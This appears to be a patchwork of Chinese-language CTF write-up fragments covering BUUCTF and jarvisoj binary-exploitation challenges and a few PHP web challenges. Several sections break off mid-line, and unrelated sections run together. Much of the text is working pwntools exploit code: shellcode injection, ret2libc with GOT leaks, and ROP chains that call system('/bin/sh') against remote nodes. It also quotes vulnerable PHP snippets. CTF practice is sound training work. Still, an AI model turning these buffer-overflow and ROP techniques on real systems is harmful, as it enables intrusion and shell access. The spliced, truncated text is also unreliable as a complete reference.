[TOC] 0x30.jarvisoj_level1 ssize_t vulnerable_function() { char buf[136]; // [esp+0h] [ebp-88h] BYREF printf("What's this:%p?\n", buf); return read(0, buf, 0x100u); }tmd，这题给的题目和平台的题不太一样，正常这道题的exp： from pwn import * context(log_level='debug') io = process("./level1") ##io = remote("node4.buuoj.cn",29905) buf_addr = int(io.recv()[-12:-2],16) payload = asm(shellcraft.sh()) payload +=(0x88+4-len(asm(shellcraft.sh())))*'a' + p32(buf_addr) print hex(buf_addr) io.sendline(payload) io.interactive()只能ret2libc了： from pwn import * context(log_level='debug') ##io = process("./level1") elf = ELF("./level1") libc = ELF("./libc-2.23.so") io = remote("node4.buuoj.cn",29905) payload =

[TOC] 0x20.jarvisoj_level3_x64 ret2libc from pwn import * context(log_level='debug') ##io = process("./level3_x64") io = remote("node3.buuoj.cn",29779) elf = ELF("./level3_x64") libc = ELF("./libc-x64-2.23.so") write_plt = elf.plt['write'] read_got = elf.got['read'] main_addr = elf.sym['main'] pop_rdi_ret = 0x4006b3 pop_rsi_r15_ret = 0x4006b1 io.recv() payload = 'a'*(0x88)+ p64(pop_rdi_ret)+p64(1) payload += p64(pop_rsi_r15_ret) +p64(read_got)+p64(8)+p64(write_plt)+ p64(main_addr) io.sendline(payload) read_add = u64(io.recv()[0:8]) print hex(read_add) base = read_add - libc.symbols["read"] sys_add = base + libc.symbols["system"] bin_sh = base + libc.search("/bin/sh").next() payload = 'a'*(0x88)+p64(pop_rdi_ret)+p64(bin_sh)+p64(sys_add)+p64(main_addr) io.sendline(payload) io.interactive()0x21.picoctf_2018_rop chain win1(): void win_function1() { win1 = 1; }win2(): int __cdecl win_function2(int a1) { int result; // eax result = (unsigned __int8)win1; if ( win1 && a1 == 0xBAAAAAAD ) { win2 = 1; } else if ( win1 ) { result = puts("Wrong Argument. Try Again."); } else

0x1.test_your_nc nc一下就完事。 0x2.rip checksec： yutao@pwnbaby:~/Desktop$ checksec pwn1 [*] '/home/yutao/Desktop/pwn1' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX disabled PIE: No PIE (0x400000) RWX: Has RWX segmentsida打开，有个后门函数：fun() 双击s到stack of main，15字节，exp： from pwn import * io = process("./pwn1") payload = 'a'*(0xf + 8) + p64(0x40118a) ##具体86还是87/8a

[TOC] 0x10.[HarekazeCTF2019]baby_rop 没后门函数： int __cdecl main(int argc, const char **argv, const char **envp) { char v4[16]; // [rsp+0h] [rbp-10h] BYREF system("echo -n \"What's your name? \""); __isoc99_scanf("%s", v4); printf("Welcome to the Pwn World, %s!\n", v4); return 0; }from pwn import * context(log_level='DEBUG') ##io = process("./babyrop") io = remote('node3.buuoj.cn',28280) elf = ELF('./babyrop') io.recv() sys_plt = elf.plt["system"] pop_rdi_ret =0x0400683 bin_sh = 0x0601048 payload = 'a'*0x18+ p64(pop_rdi_ret)+p64(bin_sh)+p64(sys_plt)+p64(0xdeadbeef) io.sendline(payload) io.interactive()0x11.jarvisoj_level2_x64 ssize_t vulnerable_function() { char buf[128]; // [rsp+0h] [rbp-80h] BYREF system("echo Input:"); return read(0, buf, 0x200uLL); }有/bin/sh字符串，没啥写的。 from pwn import * ##io = process("./level2_x64") io = remote('node3.buuoj.cn',28783) elf = ELF("./level2_x64") io.recv() sys_plt =

0x10.[ACTF2020 新生赛]Upload 和之前的一个一样，改个后缀名就OK。 0x11.[ACTF2020 新生赛]BackupFile 可以简单扫下，发现index.php.bak <?php include_once "flag.php"; if(isset($_GET['key'])) { $key = $_GET['key']; if(!is_numeric($key)) { exit("Just num!"); } $key = intval($key); $str = "123ffwsfwefwf24r2f32ir23jrw923rskfjwtsw54w3"; if($key == $str) { echo $flag; } } else { echo "Try to find out source file!"; }str弱相等，被转化为整形 传参ke

[TOC] 0x1.[HCTF 2018]WarmUp 代码审计+文件包含 <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"=>"hint.php"]; if (! isset($page) || !is_string($page)) { echo "you can't see it"; return false; } if (in_array($page, $whitelist)) { return true; } $_page = mb_substr( $page, 0, mb_strpos($page . '?', '?') ); /*这里mb_sustr 是个截断，返回0到mb_strpos之间的内容，而mb_strps 则是查找第一次出现的位置， 所以基本可以